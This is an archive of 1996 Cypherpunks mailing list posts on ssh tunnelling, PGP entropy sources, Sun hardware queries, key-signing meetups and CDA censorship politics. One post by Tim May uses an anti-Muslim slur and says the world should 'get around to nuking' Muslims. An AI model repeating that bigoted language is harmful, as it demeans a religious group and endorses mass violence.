the library to generate or process stealth.  Of course, you could always 
strip the unstealthy data out as you would with PGP 2.x, but that doesn't 
help on the receiving end.

--
Johnathan M. Corgan
jcorgan@aeinet.com
http://www.aeinet.com/jcorgan.htm

"One should realize, of course, that whether Crypto Anarchy
prevails depends not upon the varied philosophical leanings of
citizen-units May and Denning, but rather upon whether our
mathematics is more powerful than their jackbooted thugs."

                                                -Mike Duvos

(seemed appropriate :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 13 Feb 1996 15:10:01 +0800
To: cypherpunks@toad.com
Subject: Dave Winer, MORE, and Outline Processors
Message-ID: <ad451c8a560210044d4c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:21 PM 2/12/96, William Knowles wrote:
>Found this in my mail this morning.

>---------------------------------------
>Amusing Rants from Dave Winer's Desktop
>Released on 2/12/96; 5:59:40 AM PST
...
>  The first huge blast of cyberpsace puffery and a historic rejection
>  of the US Constitution, on the same day.

Some will say this has nothing to do with cryptography, but I want to share
something about Dave Winer.

Dave Winer wrote "MORE." the outline processor I wrote my Cyphernomicon FAQ
in (and many other things over the years). Winer originally wrote "Think
Tank," which I also had on my original IBM PC, circa 1983-4, and then
"MORE," for the Macintosh. These were the preeminent outline processors, a
market niche which has, sadly, almost vanished. (The outliner in Microsoft
Word is primitive and cumbersome by comparison. FrameMaker, an otherwise
extremely powerful writing tool, lacks an outline mode altogether. Hence I
seldom use it.)

Winer and his partners (not sure who they were) sole their company, Living
Videotext, to Symantec. Symantec supported MORE for a couple of upgrades,
then let it fade out. (MORE 3.1 still runs flawlessly on my Macintosh
7100av, with System 7.1.2, but will likely eventually stop working with
some version of the System.)

I've seen new-in-the-box copies of MORE 3.1 for $75 at Weird Stuff
Warehouse, in Sunnyvale, CA. I highly recommend MORE for any of you Mac
users out there.

(In case anyone is wondering, no, I don't use MORE to write my things for
this list. Conventional text editing is sufficient for these relatively
short items. I don't even use a spulling checker anymore.)

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Tue, 13 Feb 1996 09:17:00 +0800
To: willer@carolian.com (Steve Willer)
Subject: Free end-to-end encryption code?
In-Reply-To: <311f5807.109332@saturn>
Message-ID: <199602121637.SAA05691@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> As a side project, to support remote mail and news pickup through the
> Internet to my company's servers (through a firewall), I've been
> slowly writing an end-to-end encryption program. Essentially, the idea

Sounds like something that could be directly done with ssh
[http://www.cs.hut.fi/ssh] using TCP/IP forwarding.  I've myself used
it to encrypt the connection to the smtp port on a remote server.
I configured sendmail to use "localhost" as the major relay host,
disabled the sendmail daemon, and ran sendmail from cron to process
the queue every now and then.  Incoming mail was fetched via ssh from
a remote file server using a couple of small scripts.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Tue, 13 Feb 1996 14:59:30 +0800
To: Steve Willer <willer@carolian.com>
Subject: Re: Free end-to-end encryption code?
In-Reply-To: <311f61c8.2606869@saturn>
Message-ID: <Pine.3.89.9602121825.A22210-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 12 Feb 1996, Steve Willer wrote:

> On Mon, 12 Feb 1996 09:46:29 +0000, you wrote:
> 
> >On Mon, 12 Feb 1996, Steve Willer wrote:
> >
> >> As a side project, to support remote mail and news pickup through the
> >> Internet to my company's servers (through a firewall), I've been
> >> slowly writing an end-to-end encryption program. Essentially, the idea
> >
> >Why reinvent the wheel?  Lots of end-to-end stuff out there - I use ssh, 
> >myself...
> 
> Okay...well...here's another problem. You see, most of the clients are
> going to be Windows people. I can't use a Unix-only solution.

There exists at least one ssh Windows client.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Wed, 14 Feb 1996 05:32:56 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <199602130100.UAA12306@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


> It makes me very wary of them.  What gets me are all the people here who
> talk about them as if they will have useful features.  They will be about as
> useful as the ratings on video games.  ("Hey, theres a cool one!  This one
> has flying mangled bodies!  Its OK though.  No sex!")

What's the line in the song "Father Bruce"?

"The word to kill ain't dirty
 I used it in the last line
 but use a short word for lovin'
 and you wind up doin' time..."


 
--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 14 Feb 1996 08:05:54 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks vs. Coderpunks
Message-ID: <ad453be957021004ac4f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Much has been written by people about the "appropriate themes" of the
Cypherpunks list. I'm sure I don't need to remind you all of this ongoing
debate.

Well, the "coders" have formed their own list, closed to non-coders, and
known as "Coderpunks." More power to them. (Archives of this list may now
be found at Todd Masco's site: http://www.hks.net/cpunks/index.html.

Apparently the Cyphepunks list is thus being left to those of us who either
don't want to code, or have no skills at coding, or who think the
sociopolitical issues are more interesting.

It may turn out that the "gated community" of Coderpunks is ultimately more
influential, and that the "favela" of Cypherpunks is filled with the rants
and raves about "Assasination Politics," who deserved to be nuked in WW II,
whether Vince Foster was killed by the NSA or the Mossad, and so forth.

Whatever, this ought to once and for all answer the question of whether
only _coding_ topics alone belong on Cypherpunks: the answer is, clearly,
that they _don't_. If you want to discuss coding, go over to Coderpunks and
see if you have the magic password that gets you in. Otherwise, we have
political rants over here to get back to.

(ObPerry: "What does this have to do with crypto or coding?" ObAnswer:
"Nothing, this is Cypherpunks, not Coderpunks.")

--Tim May, an unelected spokesman of the Cypherpunk Ghetto (tm)




Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 14 Feb 1996 17:16:24 +0800
To: cypherpunks@toad.com
Subject: Re: Online Zakat Payment: Religious tithe.
Message-ID: <ad4541d1000210045325@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:07 PM 2/12/96, Steven C. Perkins wrote:
>Cyber-Anarchists aren't the only ones who can use the Net.
>
>>--- Forwarded message follows ---
>>From: zakat@dircon.co.uk (Sohail Mohammed)
>>Subject: Online Zakat Payment
...
>>Zakat collection and distribution is not a free-enterprise do-it-yourself
>>project. Khalifa AbuBakr (RA) went to war against those people who did
                                ^^^^^^^^^^^
>>not want to pay Zakat to the central authority and who instead wanted to
  ^^^^^^^^^^^^^^^^^^^^^
>>do it 'their-way'.

I think it safe to say the ragheads want their taxes (= "Zakat") collected,
and they will block any schemes which attempt to bypass their tax
collectors. They are enemies of Cypherpunks, but then we all knew that a
long time ago.

>>The long term strategy is that we Muslims need a major presence in
>>cyberspace. This would include intelligent agents (robots, sheriffs,)
>>roaming cyberspace collecting Zakat funds and Jihad funds and doing other
>>things we can't yet imagaine. Islamic Gateway http://www.ummah.org.uk

Yes, such as collecting funds to send to Jim Bell to arrange for the
assassination of Salman Rushdie.

Once again, the gutter religion of Islam reveals the derangement of its
so-called Prophet.

The world really needs to get around to nuking these folks.

--Tim May


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yanni <jon@aggroup.com>
Date: Wed, 14 Feb 1996 05:31:21 +0800
To: "Michael E. Carboy" <carboy@hooked.net>
Subject: Re: COO_kie
Message-ID: <9602122040.AA18721@jon>
MIME-Version: 1.0
Content-Type: text/plain


> So, Folks, how does one manipulate the cookie in Netscape so that the
> user can control what Netscape sees???
>
> Michael E. Carboy
> carboy@hooked.net

Simple, read the cookie specs on the NetScape site. :)

http://home.netscape.com/

-jon

Jon S. Stevens         yanni@clearink.com
ClearInk WebMagus      http://www.clearink.com/
finger pgp@sparc.clearink.com for pgp pub key
My apologies for the loss of bandwidth. :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 13 Feb 1996 14:20:02 +0800
To: cypherpunks@toad.com
Subject: Re: LI Newsday OpEd: Criminal Justice System
Message-ID: <ad45438f01021004bc0a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:16 PM 2/12/96, Perry E. Metzger wrote:
>"Deranged Mutant" writes:
>> Found a really good op-ed piece in LI Newsday, Thurs. Feb 8, pA53
>> by Robert Reno, "If Jails Are Full, How Much Tougher Can Judges Get?"
>
>I personally find stuff like this interesting, but I prefer read about
>it in places like libernet or the like. Cypherpunks is for
>cryptography.

Au contraire. Those interested in pure cryptography and coding are over in
Coderpunks, the new gated community for such folks.

The rest of us, stuck here in the ghetto of Cypherpunks, will talk about
what we want to talk about.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Tue, 13 Feb 1996 15:00:10 +0800
To: cypherpunks@toad.com
Subject: Re: Using /dev/random for PGP key generation? Be Wary
Message-ID: <199602130143.UAA23096@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

rngaugp@alpha.c2.org wrote in the c'punks list:
> Subject: Using /dev/random for PGP key generation? Be Wary
> 
> I have created a modified version of pgpi for use with a hardware random
> number generators. Recently, there has been some confusion because
> people have assumed that I wished people to use this version with
> NOISE.SYS or an RNG that gathers entropy from timing events called
> /dev/random.

My concern, since there is a DOS version available according to your 
announcement (and this applies to OS/2 and Linux compilations as well) is 
that your version assumes /dev/random produces a continuous stream rather 
than bursts of data limited to how much entropy is gathered.  A poor 
implementation even with a good driver is disasterous.

[..]
> Be assured that I originally planed the modification to be used with a
> real hardware RNG. I tested it with the CALNET/NEWBRIGE RNG under DOS
> and OS/2. The "RNGDRIVER" feature I tested with OS/2 and the driver in
> RNG810.ZIP available at ftp.cdrom.com.

Hmmm... I'll have to check that out.

[..]

> I am unsure about using my modification, together with these drivers
> that are not connected to a real hardware RNG. In what way would the use
> of these drivers' methods of gathering entropy be superior to PGP's
> method of getting entropy from keyboard timing? If you choose to do
> something like this, you should think carefully and make a careful study
> of the code.

I'm curious as to what method you tyest the hardware RNG's entropy?

[..]

> made to work. But careful thought an careful design should be done
> first.

Yep.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMR/s2yoZzwIn1bdtAQEdeAF/XFFki97J+phJv76eMZXcMyHt1ChjN3FD
PsMvsq03g/QHYfAMhb25qoSp5H6F5HFZ
=2l/3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Wed, 14 Feb 1996 05:38:32 +0800
To: cypherpunks@toad.com
Subject: Portland, OR, Key-Signing+
Message-ID: <2.2.32.19960213044547.0069d4a8@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

ANNOUNCING:
THE SECOND QUASI-MONTHLY PORTLAND CYPHERPUNKS SOIREE AND KEY-SIGNING

Yes, it's that time again.

When:   Saturday, February 26, 1996
        come 4:30-5 pm to join those of us watching the new 
        episode of MYSTERY SCIENCE THEATER 3000, or
        come 7:30-8 pm to avoid it

Where:  my apartment, in SE Portland
        e-mail me for directions

This meeting is about to be announced in a bunch of local and
regional newsgroups; I hope to get a crop of novices as well 
as the more experienced folks. A keysigning will take place, 
with instructions for it mailed out later in the week.

I have a PC running Windows 95, and it'll be available for use in
key verification and the like. If anyone has a portable computer
with another OS to bring, please do.

Proposed topics:

1) Alan Olsen is working on an e-mail client with PGP integration.
Let's talk interface.

2) I'm working on a guide for crypto newbies. Come and tell me what
works or doesn't.

3) So, just how lame is the Communications Decency Act, anyway? :-)

4) Whatever of crypto relevance is on your mind.

Since there was confusion last time about expectations, let me spell
out of a few things up.

1) Since some participants have expressed the desire not to be
photographed, no cameras.

2) Insofar as others have other concerns, e-mail me. No guarantees
on what we can do or not, but I'd like as many people as possible 
to be as comfortable as possible.

3) What's discussed during the soiree _will_ be fair game for
comment later. Interesting insights, dramatic news, stunning
rhetoric, the whole deal, may all be continued on the net later.

There are, alas, some restrictions on partying tools, imposed by 
my chronic immune problems. If you smoke, a) please hold off if
possible or b) take it outside and away from my door. (I have a 
nice back patio suitable for this purpose, since I never use it 
for anything.) I will have quite a variety of drinks on hand, 
but please, leave the alcohol at home. Ditto for any scents or 
perfumes you might usually wear. This way I get to have fun, too. 
:-)

I really hate to add this particular paragraph (and it isn't in the
version that'll get posted to newsgroups), but...one person won't be
welcome. Jim Bell's conduct at the last meeting and on the list are
such as to make it quite clear that I don't want him in my home. I
won't send him directions. I ask that nobody else do so. If he
shows, he will not be allowed in. I have no interest in hosting a
get-together dominated by the perpetuation of an increasingly dull
flamewar. (And if he can stop grinding the usual axes in the next
two weeks, I'd be delighted to drop this.) The time and energy I,
and other participants, have are too valuable to waste that way. 
(And if he thinks I'm being unreasonable, he is of course free to 
organize his own gathering.) [Note: I will not pursue this matter
further on Cypherpunks. I needed to announce it; I don't need to
sustain the flame fest.]

Regards,



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEQAwUBMSAW8X3AXR8sjiylAQHECQfRAVlw1MzEpCceLzxM3LbwuLwmSpgacLFi
8eUNFGNHis1xwpOvYpY/u/6WQXScI00oq/44euY8N6bzUxV6djbhIPR1jX+J0KrQ
2Dl8gZgaRNdo69nBabIt3gBG4OZzWiqX2g7YLOcr4I7rcNvCPn0SbaIayb5trgjh
AWSVnC1g8gy17XBpAZMrLurgQQx0ul5CS0RreO6/Tpqy3P2V2ly0+k3k9p29RJly
Y/Ug7KSYxirXUt07eeI8HCXzEtJ8DvN133Nwbos7WZvXitR5fzf0eXbxGSe7WXay
KB0olIiWEi/r0q7xP8GdE07WcBzbXCfH5Uf6VPr9F34rig8=
=p6BW
-----END PGP SIGNATURE-----

Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 14 Feb 1996 05:33:08 +0800
To: cypherpunks@toad.com
Subject: Re: Using /dev/random for PGP key generation? Be Wary
Message-ID: <199602130446.UAA15045@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:56 AM 2/12/96 -0500, rngaugp@alpha.c2.org wrote:
>...
>I am unsure about using my modification, together with these drivers
>that are not connected to a real hardware RNG. In what way would the use
>of these drivers' methods of gathering entropy be superior to PGP's
>method of getting entropy from keyboard timing? If you choose to do
>something like this, you should think carefully and make a careful study
>of the code.

If there are no common-mode sources, xoring two streams will not reduce the
entropy.  If you use PGP's keyboard timings for one stream, and (e.g.) disk
drive randomness for the other, the output of the xor of the two streams
should have at least as much entropy as the best of the two.

However, I would be worried if /dev/random and PGP were both using keyboard
timings to generate entropy.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mch@squirrel.com (Mark C. Henderson)
Date: Tue, 13 Feb 1996 16:09:19 +0800
To: Ashfaq Rasheed <cypherpunks@toad.com
Subject: Re: To find the clock speed of a sun workstation
Message-ID: <199602130513.VAA23145@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 12, 16:16, Ashfaq Rasheed wrote:
} Subject: To find the clock speed of a sun workstation
} Hi
} 
} Is there anyway of finding the clock speed of the CPU on a Sun workstation?
} As far as i know it can be found only by rebooting the machine and using
} module-info? And I believe that the module-info does a no-op loop for a
} a known number of times and calculates the time taken.
} 
} I would like to know if there is anyother way to finding it.

If you run /usr/etc/devinfo -vp (Sun OS 4.1.x), or /usr/sbin/prtconf -vp
(Solaris 2.x) you'll get a line which looks like

clock-frequency:  02625a00

This is the clock frequency in hexadecimal in Hz.

The above example is from an IPX (40 MHz).

Another example. On an SS1000E with two 60 MHz processors, you'll
get output indicating two CPU devices each starting with

        Node 0xffd8e6ac
            clock-frequency:  03938700
            device_type:  'cpu'

again 0x03938700 == 60000000 

On an Ultra 170E one gets
    Node 0xf006ea64
        manufacturer#:  00000017
        implementation#:  00000010
        mask#:  00000022
        sparc-version:  00000009
        ecache-associativity:  00000001
        ecache-line-size:  00000040
        ecache-size:  00080000
        #dtlb-entries:  00000040
        dcache-associativity:  00000001
        dcache-line-size:  00000020
        dcache-size:  00004000
        #itlb-entries:  00000040
        icache-associativity:  00000002
        icache-line-size:  00000020
        icache-size:  00004000
        upa-portid:  00000000
        clock-frequency:  09f437c0
        reg:  000001c0.00000000.00000000.00000008
        device_type:  'cpu'
        name:  'SUNW,UltraSPARC'


and 0x09f437c0 == 167000000

Watch out for other lines labelled, clock-frequency, these are for 
other devices. You want the one for the CPU device(s) (i.e. node with 
device type 'cpu'). 


-- 
Mark Henderson -- markh@wimsey.bc.ca, henderso@netcom.com, mch@squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer  --  ftp://ftp.wimsey.com/pub/crypto
ftp://ftp.wimsey.com/pub/crypto/sun-stuff/change-sun-hostid-1.6.2.tar.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Oscar Boykin <boykin@pobox.com>
Date: Tue, 13 Feb 1996 14:23:59 +0800
To: cypherpunks@toad.com
Subject: cypherpunks t shirts, anymore?
Message-ID: <2.2.32.19960213032248.008efd40@fitten95.residence.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


I know someone that got bought a black sypherpunks t shirt with warning
strong crypto on it.

Are there any more of these?  I would like to purchase a large.

Please contact me if you know anything.

oscar boykin
mailto:boykin@pobox.com
http://pobox.com/~boykin
home: 404-206-0477





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 13 Feb 1996 14:23:41 +0800
To: abostick@netcom.com (Alan Bostick)
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
In-Reply-To: <199602121313.IAA26828@UNiX.asb.com>
Message-ID: <wl80F3C00iUvQ=xcQg@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Alan writes:
>No surprises here.  Except for the "on-line elite" shot in the dark, the
>anti-sex censors have been talking this way for decades.
> 
>What's interesting is that your report of this spokesperson's tone makes
>it sound *defensive* -- like a reaction to an onslaught rather than a
>celebration of victory.

Exactly. Catharine MacKinnon, for instance, has called the EFF and other
Rimm-debunkers part of the "pro-pornography power block" which
represents the "howling fury of the pornographers protecting their
penises and their wallets."

The Family Research Council, which wrote today's Newsday today, has
launched similar attacks. The FRC is run by Gary Bauer, a former policy
assistant to Reagan and a former undersecretary at the Department of
Education. Now he heads the FRC, the DC-based lobbying extension of
James Dobson's "Focus on the Family." Dobson's history includes serving
on the Attorney General's Commission on Pornography (the Meese
Commission). Bauer also embraced Marty Rimm's cyberporn study as gospel,
calling the ACLU and EFF "porn industry apologists" who are "taking
cheap shots at this comprehensive study."

Thanks to Rob, the Newsday op-ed is at:
   http://fight-censorship.dementia.org/fight-censorship/dl?num=1153

Related articles about the FRC are at:
   http://fight-censorship.dementia.org/fight-censorship/dl?num=247
   http://fight-censorship.dementia.org/fight-censorship/dl?num=839

ObCrypto: Yes, Know Your Enemies and work with the natural enemies of
the religious right, such as groups like the ACLU and the FEN. The
theocratic push to outlaw nonescrowed crypto is next.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Wed, 14 Feb 1996 17:16:57 +0800
To: cypherpunks@toad.com
Subject: Four letter words (was Re: Req. for soundbites)
Message-ID: <199602130329.WAA23482@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm no etymologist, nor do I play one on TV, but...

A few words of note about the "four letter words":
a) at one time they were quite acceptable, even after the Norman invasion 
of England; read Chaucer's Canterbury Tales... meant to be read in polite 
company, mind you.  A few Old English texts are also peppered with them, 
which at the time was also quite acceptable...
b) ...while words for bodily functions like shit, pis, fuck, etc. were 
acceptable, blasphemes were not... "god dammit" and "ods-bodkin" and 
"bloody" ("odsblood") were really naughty, even legally punishable(?). 
Note that the latter are quite usable on TV and have been used in 
congress on C-SPAN quite often while the former are illegal... you can 
make a very good religious argument for banning blasphemes and allowing 
words for bodily functions...
c) for a Latin-speaker in Ancient Rome, "feces" = "shit", etc. etc. Some 
languages do not distinguish a polite word vs. a naughty word for these 
things (a very important point)
d) they're just words... superstitious beliefs that a word is harmful...

ObCrypto: I wish I knew.... back to your regularly scheduled programme.

bob bruen wrote:
> 
>    For what it's worth department:
> 
>    The four letter words that are considered indecent are an anachronism
>    from the days when the French/Normans ruled England, (~1066-1300's).
>    A quick look at the words and their acceptable counterparts will make
>    clear the issue. The four letter word are all of English derivation and
>    the socially acceptable ones are of French (sometimes Latin) derivation.
>    Even the term "four-letter" is a derogatory term for the English language
>    in general, because the French considered English second rate because the
>    words tended to be short, unlike French. Anyone who supports the suppression
>    of these words is merely enforcing the old French repression of the English
>    and the English language from over 500 years ago. Why think for yourself
>    when tradition can do it for you?
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSAFkioZzwIn1bdtAQEKuAGAsvpx5YmmS78Cwze1cvS5jZdSsMF3VcbO
fLANxaceEXG2r5CKywmHgHsADUCCTlOB
=qw9h
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Judith Milhon <stjude@well.com>
Date: Wed, 14 Feb 1996 13:01:30 +0800
To: cypherpunks@toad.com
Subject: uh oh, mutation time?
Message-ID: <199602130658.WAA27561@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Electronic Guerrillas: Resisting Net Censorship
THE MUTATE PROJECT
http://www.onworld.com/MUT

"Don't black out YOUR website.  Black out THEIRS"

        Hassan I Sirius

        2/8/96

This is an invitation to join a public forum on the World Wide Web on
resisting internet censorship.  By now, you have all heard about the
Communications Decency Act and you know, or should know, the scope of this
law.  This discussion will revolve around active resistance to this law;
routing around it, on-line uncivil disobedience, pranking, hacking, and
otherwise fucking with the Net Cops.  And ordinary political organizing need
not be excluded.

Electronic Guerrillas:  Resisting Net Censorship is a topic within a Forum
called Kulchur Wars.  Kulchur Wars is a Forum that is part of The Mutate
Forum.  The Mutate Forum is a part of the website "THE MUTATE PROJECT."  THE
MUTATE PROJECT is an outgrowth of the book "How to Mutate & Take Over the
World" by R. U. Sirius, St. Jude & The Internet 21.  

While we'd planned to officially open THE MUTATE PROJECT in mid-February,
we've decided to open up the forum TODAY, in response to the passage of this
legislation.

Don't worry.  It's easy to open up this Chinese box.  

Just go to
http://www.onworld.com/MUT
click on 
Mutate Forum
Read your induction papers
Click on 
Join a Cool Conspiracy
open
Kulchur Wars
add your posting to the string entitled Electronic Guerrillas: Resisting Net
Censorship

Feel free to post in the other topics
start your own
or to poke around in the scaffolding of THE MUTATE PROJECT
but remember that it's STILL UNDER CONSTRUCTION

see you there

R. U. Sirius
Sirius Communications




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 14 Feb 1996 12:57:42 +0800
To: "A. Padgett Peterson P.E. Information Security" <cypherpunks@toad.com
Subject: Re:
Message-ID: <m0tmEob-00090mC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:41 PM 2/12/96 -0500, A. Padgett Peterson P.E. Information Security wrote:
>
>>Yet if I read you correctly earlier, you don't think the USG has the right 
>>to regulate those communications. Why the distinction ?
>
>Okay, obviously I need to drop down a gear & explain *my* feelings:
>
>Part of the definition of a "sovereign nation" is to define and carry
>out both high and low justice over it's domain - the absolute right
>of a sovereign. Is not mentioned in the US constitution because it 
>was a given.

Hardy har har!  This sounds like a joke, right?  Anything you WANT the 
Constitution to have said, "is not mentioned in the Constitution because it 
was a given."

Thanks for making me laugh...at you!


>"Free speech" means that a citizen is free to speak (communicate) anthing,
>anytime, anywhere. This is the right guarenteed by the first amendment. This
>does not relieve the individual from being liable for the consequences of 
>the exercise of "free speech".

This statement is internally inconsistent.  If the speech is truly "free," it 
is (and should be!) unconstrained.  To whatever extent it is constrained, it 
is not entirely "free."  Now, even if we all agree that SOME speech should 
be limited, don't try to use this argument to allow the government to 
restrict ALL speech!


>However, the government is under no obligation (though in the silly seventies
>it seemed that we were going that way) to aid or abet in the exercise of
>free speech. If it were properly and legally decided that communications 
>with anon.penet.fi is against "national interest" then the sovereign has 
>not only the "right" but the *duty* to block/monitor such communications.

Here you get wacky again.  You first make a true statement, and then come to 
a false conclusion.

Logic lesson for Padgett:

There are at least three categories here:

1.  Government restricts communication.
2.  Government neither assists nor restricts communication.
3.  Government assists communication.  (through stolen tax dollars, BTW.)

Your first sentence in the paragraph immediately above simply says that item 
3 is not required.  That is a true statement.  However, you falsely 
(apparently deliberately?) suggest that item 2 cannot exist; the only 
alternative is item 1.

Get real, Padgett.  Wake up.

Jim Bell

Klaatu Burada Nikto






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 14 Feb 1996 12:53:30 +0800
To: cypherpunks@toad.com
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <199602130712.XAA26897@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> One thing the V-Chip gives us is the argument:  Now that parents have the
>> ability to control what their children watch, the government should turn
>> responsibility over to them and butt out.

Unfortunately course it doesn't; we still "need" the government to control
sex and indecency on TV, plus to enforce the "voluntary" rating standards
and make sure TV companies attach them to their programs.  Sigh.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Tue, 13 Feb 1996 17:00:49 +0800
To: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Subject: Re:
Message-ID: <v01530500ad45e45e171a@[204.179.169.57]>
MIME-Version: 1.0
Content-Type: text/plain


}>Yet if I read you correctly earlier, you don't think the USG has the right
}>to regulate those communications. Why the distinction ?
}
}Okay, obviously I need to drop down a gear & explain *my* feelings:
}
}Part of the definition of a "sovereign nation" is to define and carry
}out both high and low justice over it's domain - the absolute right
}of a sovereign. Is not mentioned in the US constitution because it
}was a given. <-------No offense, but what the fuck kind of logic is that?
}It is not a given.  It was not put in because that is not the type of
}government the founders endevored to erect.  Read on please, I'll explain
}myself.

}Further, the purpose of the US Constitution is to:
}a) define what the sovereign was (three branches - rock, scissors, & paper)
}b) set forth certain limitations on that sovereign ("Congress shall make
}   no law...")
}c) define certain duties of the sovereign (regulation of foreign commerce...)

<rm>

